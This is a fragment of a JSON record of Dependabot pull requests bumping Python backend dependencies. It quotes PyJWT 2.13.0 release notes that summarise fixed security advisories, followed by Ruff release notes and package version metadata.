\u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e2.12.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd typing_extensions dependency for Python \u0026lt; 3.11 by \u003ca href=\"https://github.com/jpadilla\"\u003e\u003ccode\u003e@​jpadilla\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1151\"\u003ejpadilla/pyjwt#1151\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.0...2.12.1\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.0...2.12.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e2.12.0\u003c/h2\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eValidate the crit (Critical) Header Parameter defined in RFC 7515 §4.1.11. by \u003ca href=\"https://github.com/dmbs335\"\u003e\u003ccode\u003e@​dmbs335\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-752w-5fwx-jx9f\"\u003eGHSA-752w-5fwx-jx9f\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ccode\u003ev2.12.1 \u0026amp;lt;https://github.com/jpadilla/pyjwt/compare/2.12.0...2.12.1\u0026amp;gt;\u003c/code\u003e__\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/a4e1a3d1218b01c5806420b8f16d9308ac4adc30\"\u003e\u003ccode\u003ea4e1a3d\u003c/code\u003e\u003c/a\u003e Add typing_extensions dependency for Python \u0026lt; 3.11 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1151\"\u003e#1151\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/bd9700cca7f9258fadcc429c1034e508025931f2\"\u003e\u003ccode\u003ebd9700c\u003c/code\u003e\u003c/a\u003e Use PyJWK algorithm when encoding without explicit algorithm (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1148\"\u003e#1148\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.10.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=pyjwt\u0026package-manager=uv\u0026previous-version=2.10.1\u0026new-version=2.13.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/Smitbafna/Eventora/pull/27","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Smitbafna%2FEventora/issues/27","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/27/packages"}},{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":null,"pr_created_at":"2026-06-14T00:34:24.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4657421193","node_id":"PR_kwDOQedBh87mKHET","number":585,"state":"open","title":"chore(deps): bump the pip-backend-patch-minor group across 1 directory with 15 updates","user":"dependabot[bot]","labels":["dependencies","type:chore","area:backend","area:ci"],"assignees":[],"locked":false,"comments_count":9,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-14T00:34:24.000Z","updated_at":"2026-06-14T00:38:40.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"pip-backend-patch-minor","update_count":15,"packages":[{"name":"ruff","old_version":"0.15.10","new_version":"0.15.17","repository_url":"https://github.com/astral-sh/ruff"},{"name":"mypy","old_version":"1.20.0","new_version":"1.20.2","repository_url":"https://github.com/python/mypy"},{"name":"pip-audit","old_version":"2.10.0","new_version":"2.10.1","repository_url":"https://github.com/pypa/pip-audit"},{"name":"coverage","old_version":"7.13.5","new_version":"7.14.1","repository_url":"https://github.com/coveragepy/coveragepy"},{"name":"fastapi","old_version":"0.135.3","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"uvicorn","old_version":"0.44.0","new_version":"0.49.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"pydantic-settings","old_version":"2.13.1","new_version":"2.14.1","repository_url":"https://github.com/pydantic/pydantic-settings"},{"name":"sqlalchemy","old_version":"2.0.49","new_version":"2.0.50","repository_url":"https://github.com/sqlalchemy/sqlalchemy"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"python-multipart","old_version":"0.0.26","new_version":"0.0.32","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"redis","old_version":"7.4.0","new_version":"7.4.1","repository_url":"https://github.com/redis/redis-py"},{"name":"pytest","old_version":"9.0.3","new_version":"9.1.0","repository_url":"https://github.com/pytest-dev/pytest"},{"name":"reportlab","old_version":"4.4.10","new_version":"4.5.1"},{"name":"sentry-sdk","old_version":"2.57.0","new_version":"2.62.0","repository_url":"https://github.com/getsentry/sentry-python"},{"name":"webauthn","old_version":"2.7.1","new_version":"2.8.0","repository_url":"https://github.com/duo-labs/py_webauthn"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip-backend-patch-minor group with 15 updates in the /backend directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [ruff](https://github.com/astral-sh/ruff) | `0.15.10` | `0.15.17` |\n| [mypy](https://github.com/python/mypy) | `1.20.0` | `1.20.2` |\n| [pip-audit](https://github.com/pypa/pip-audit) | `2.10.0` | `2.10.1` |\n| [coverage](https://github.com/coveragepy/coveragepy) | `7.13.5` | `7.14.1` |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.135.3` | `0.136.3` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.44.0` | `0.49.0` |\n| [pydantic-settings](https://github.com/pydantic/pydantic-settings) | `2.13.1` | `2.14.1` |\n| [sqlalchemy](https://github.com/sqlalchemy/sqlalchemy) | `2.0.49` | `2.0.50` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.26` | `0.0.32` |\n| [redis](https://github.com/redis/redis-py) | `7.4.0` | `7.4.1` |\n| [pytest](https://github.com/pytest-dev/pytest) | `9.0.3` | `9.1.0` |\n| [reportlab](https://www.reportlab.com/) | `4.4.10` | `4.5.1` |\n| [sentry-sdk](https://github.com/getsentry/sentry-python) | `2.57.0` | `2.62.0` |\n| [webauthn](https://github.com/duo-labs/py_webauthn) | `2.7.1` | `2.8.0` |\n\n\nUpdates `ruff` from 0.15.10 to 0.15.17\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/ruff/releases\"\u003eruff's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.15.17\u003c/h2\u003e\n\u003ch2\u003eRelease Notes\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-11.\u003c/p\u003e\n\u003ch3\u003ePreview features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow human-readable names in suppression comments (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25614\"\u003e#25614\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix handling of \u003ccode\u003eignore\u003c/code\u003e comments within a \u003ccode\u003edisable\u003c/code\u003e/\u003ccode\u003eenable\u003c/code\u003e pair (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25845\"\u003e#25845\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrioritize human-readable names in CLI output (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25869\"\u003e#25869\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRespect diagnostic start and parent ranges and trailing comments in \u003ccode\u003eruff:ignore\u003c/code\u003e suppressions (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25673\"\u003e#25673\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-async\u003c/code\u003e] Add \u003ccode\u003etrio.as_safe_channel\u003c/code\u003e to safe decorators (\u003ccode\u003eASYNC119\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25775\"\u003e#25775\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-pytest-style\u003c/code\u003e] Also check \u003ccode\u003epytest_asyncio\u003c/code\u003e fixtures (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25375\"\u003e#25375\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eruff\u003c/code\u003e] Ban \u003ccode\u003epytest\u003c/code\u003e autouse fixtures (\u003ccode\u003eRUF076\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25477\"\u003e#25477\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyupgrade\u003c/code\u003e] Add \u003ccode\u003efrom __future__ import annotations\u003c/code\u003e automatically (\u003ccode\u003eUP007\u003c/code\u003e, \u003ccode\u003eUP045\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/23259\"\u003e#23259\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix diagnostic when \u003ccode\u003eruff:enable\u003c/code\u003e or \u003ccode\u003eruff:disable\u003c/code\u003e appears where \u003ccode\u003eruff:ignore\u003c/code\u003e is expected (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25700\"\u003e#25700\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyupgrade\u003c/code\u003e] Preserve leading empty literals to avoid syntax errors (\u003ccode\u003eUP032\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25491\"\u003e#25491\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRule changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-pytest-style\u003c/code\u003e] Clarify diagnostic message for single parameters (\u003ccode\u003ePT007\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25592\"\u003e#25592\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003enumpy\u003c/code\u003e] Drop autofix for \u003ccode\u003enp.in1d\u003c/code\u003e (\u003ccode\u003eNPY201\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25612\"\u003e#25612\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epylint\u003c/code\u003e] Exempt Python version comparisons (\u003ccode\u003ePLR2004\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25743\"\u003e#25743\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReserve AST \u003ccode\u003eVec\u003c/code\u003es with correct capacity for common cases (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25451\"\u003e#25451\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFormatter\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePreserve whitespace for Quarto cell option comments (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25641\"\u003e#25641\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCLI\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow rule names in \u003ccode\u003eruff rule\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25640\"\u003e#25640\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix playground diagnostics scrollbars (\u003ca 